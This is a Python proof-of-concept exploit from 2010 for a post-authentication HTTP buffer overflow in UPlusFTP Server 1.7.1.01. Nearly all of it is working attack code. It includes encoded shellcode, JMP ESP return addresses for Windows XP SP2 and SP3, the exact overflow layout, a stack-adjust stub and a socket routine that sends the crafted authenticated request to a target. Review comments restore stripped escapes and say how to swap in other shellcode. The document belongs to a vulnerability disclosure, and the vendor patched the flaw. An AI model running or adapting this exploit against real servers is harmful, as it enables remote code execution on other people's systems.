
# Title : UPlusFTP Server v1.7.1.01 [ HTTP ] Remote Buffer Overflow [ Post Auth ]
# Published : 2010-07-28
# Author : Karn Ganeshen and corelanc0d3r


#!/usr/bin/python
import socket,sys,base64

# Banner shown on every run, before the argument check (unchanged text).
BANNER = """
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
	UPlusFTP Server v1.7.1.01 [ HTTP ] Remote BoF Exploit PoC
	Discovered by : Karn Ganeshen		   		   		   
	Author : Karn Ganeshen / corelanc0d3r
						   						   
	KarnGaneshen [aT] gmail [d0t] com 				   		   
	http://ipositivesecurity.blogspot.com
								   			   
	Greetz out to: 	corelanc0d3r
					http://corelan.be:8800/index.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
"""
print(BANNER)

# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
# Date Found : July 21, 2010
# Vendor notified on July 23, 2010
# Issue fixed and new version 1.7.1.02 released on July 23, 2010

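# NOTE(review): the listing on this page had its backslashes stripped
# ("x90", "rn").  As printed, "x90"*179 is 537 bytes of the literal text
# x90, the shellcode is ASCII text, and the request carries no CRLFs at all,
# so nothing lines up with the offsets documented below.  The "\x" and
# "\r\n" escapes are restored here; every byte value is exactly the one
# printed in the original listing, nothing was added or re-derived.
#
# The module is written to run under both Python 2 and Python 3: every
# wire-level value is a byte string, and nothing relies on print statements.

# 165-byte encoded calc.exe payload, as published.  The author states that
# bad characters were identified and excluded; the bad-character set itself
# is not given on this page, so re-check it before swapping in other shellcode.
SHELLCODE = (
    b"\xd9\xca\x29\xc9\xb1\x24\xbf\x3f\xc7\x66\x9f\xd9\x74\x24\xf4\x5e"
    b"\x31\x7e\x17\x03\x7e\x17\x83\xf9\xc3\x84\x6a\xf9\x24\x0c\x95\x01"
    b"\xb5\x06\xd0\x3d\x3e\x64\xde\x45\x41\x7a\x6b\xfa\x59\x0f\x33\x24"
    b"\x5b\xe4\x85\xaf\x6f\x71\x14\x41\xbe\x45\x8e\x31\x45\x85\xc5\x4e"
    b"\x87\xcc\x2b\x51\xc5\x3a\xc7\x6a\x9d\x98\x2c\xf9\xf8\x6a\x73\x25"
    b"\x02\x86\xea\xae\x08\x13\x78\xef\x0c\xa2\x95\x84\x31\x2f\x68\x71"
    b"\xc0\x73\x4f\x81\x10\xba\x4f\xed\x1d\xfd\x7f\x68\xe1\x86\x73\xf9"
    b"\xa2\x7a\x07\x8d\x3e\x2e\x9c\x05\x37\xdb\xaa\x5e\xc7\xab\xad\x60"
    b"\xc8\x40\xc5\x5c\x97\x67\xe0\xfc\x71\x01\xf4\x7f\xbd\x6a\x55\x17"
    b"\xce\x07\x51\xb8\x46\x80\xa4\xcc\x99\xe7\xa7\x37\xc6\x66\x34\xd4"
    b"\x27\x0c\xbc\x7f\x38"
)

# Return addresses (JMP ESP gadgets).  These are absolute addresses -- XP has
# no ASLR -- and are tied to the build they were found on ("Tested on XP Pro
# SP2 [ Eng ] and XP Pro SP3 [ Eng ]").  Re-verify them on any other service
# pack, language or hotfix level before relying on the PoC.
JMP_ESP_XP_SP2 = b"\x78\x16\xF3\x77"  # 0x77F31678  JMP ESP  (default)
JMP_ESP_XP_SP3 = b"\x3F\x71\x49\x7E"  # 0x7E49713F  JMP ESP

# Offset of the saved return address inside the ``path`` value:
# 1963 filler bytes + 179-byte NOP sled + 165-byte shellcode + 15 NOPs.
EIP_OFFSET = 1963 + 179 + len(SHELLCODE) + 15  # == 2322


def _as_bytes(text):
    """Return *text* as a byte string on both Python 2 and 3.

    Latin-1 is used so that code points 0x80-0xFF map 1:1 onto bytes; a
    credential containing characters outside Latin-1 raises UnicodeEncodeError
    (the original script would have sent garbage in that case anyway).
    """
    if isinstance(text, bytes):
        return text
    return text.encode("latin-1")


def build_payload(ret_addr=JMP_ESP_XP_SP2):
    """Return the overflow buffer that is sent as the ``path`` query value.

    Layout, as published: 1963 filler bytes, a 179-byte NOP sled, the 165-byte
    shellcode, 15 NOPs, the 4-byte return address at ``EIP_OFFSET``, 30 more
    NOPs and a 14-byte stub.  After ``JMP ESP`` fires, execution lands on the
    NOPs that follow the return address and runs the stub, which does
    ``ADD AX,037A`` three times (16-bit add, so no carry into the upper half
    of EAX) and then ``PUSH EAX`` / ``RET`` -- i.e. control is transferred to
    the adjusted EAX.  Presumably EAX is left pointing at a fixed distance
    below the shellcode by the vulnerable copy routine; nothing in this
    listing shows where, so treat 0x037A as a constant tuned for the tested
    build rather than something to recompute.

    ``ret_addr`` selects the JMP ESP gadget (``JMP_ESP_XP_SP2`` by default,
    ``JMP_ESP_XP_SP3`` for SP3); it must be exactly four bytes, otherwise
    everything after it shifts.
    """
    if len(ret_addr) != 4:
        raise ValueError("ret_addr must be 4 bytes, got %d" % len(ret_addr))
    parts = [
        b"A" * 1963,
        b"\x90" * 179,
        SHELLCODE,
        b"\x90" * 15,
        ret_addr,                  # overwrites the saved return address
        b"\x90" * 30,
        b"\x66\x05\x7A\x03" * 3,   # ADD AX,037A  (x3)
        b"\x50\xc3",               # PUSH EAX ; RET
    ]
    return b"".join(parts)


def build_request(payload, user, pwd):
    """Return the raw HTTP request (bytes) that carries *payload*.

    The bug is post-authentication, so the request includes an HTTP Basic
    ``Authorization`` header built from *user* and *pwd*.  The trailing space
    after ``HTTP/1.1`` and the empty ``Host`` header are kept exactly as the
    PoC was tested; both are technically malformed HTTP/1.1, but that is what
    the vulnerable parser was exercised with, so they are not "fixed" here.
    """
    credentials = _as_bytes(user) + b":" + _as_bytes(pwd)
    auth = base64.b64encode(credentials)
    request = b"GET /list.html?path=" + payload + b" HTTP/1.1 \r\n"
    request += b"Host: \r\n"
    request += b"Authorization: Basic " + auth + b"\r\n"
    request += b"\r\n"  # blank line terminates the header block
    return request


def send_exploit(target, port, request, timeout=10.0):
    """Deliver *request* to ``target:port`` over TCP and close the socket.

    Returns True once the whole request has been written, False on any socket
    error (refused, reset, timeout) after printing it.  A timeout is applied so
    an unreachable host does not hang the PoC; ``sendall`` is used because a
    single ``send`` may write only part of the ~2.3 KB request.  No response is
    read -- the server is expected to crash or run the payload, not to answer.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((target, port))
        sock.sendall(request)
        print("[!] Payload sent...")
        return True
    except socket.error as exc:
        # Narrow catch: the original bare ``except:`` also swallowed
        # KeyboardInterrupt and hid the reason for the failure.
        print("[x] Error: %s" % exc)
        return False
    finally:
        sock.close()


def main(argv=None):
    """Entry point: ``poc.py <Target IP> <Port> <User> <Password>``.

    Parses the four positional arguments, builds the request and sends it.
    Exits with status 1 on a usage error.  Note that the credentials are taken
    from the command line and are therefore visible in process listings --
    acceptable for a lab PoC, not for anything else.
    """
    args = sys.argv if argv is None else argv
    if len(args) != 5:
        print("Usage: ./poc.py <Target IP> <Port> <User> <Password>")
        sys.exit(1)

    target = args[1]
    try:
        port = int(args[2])
    except ValueError:
        print("[x] Port must be an integer, got %r" % args[2])
        sys.exit(1)
    user = args[3]
    pwd = args[4]

    print("[+] Launching exploit against " + target + "...")
    request = build_request(build_payload(), user, pwd)
    send_exploit(target, port, request)


if __name__ == "__main__":
    main()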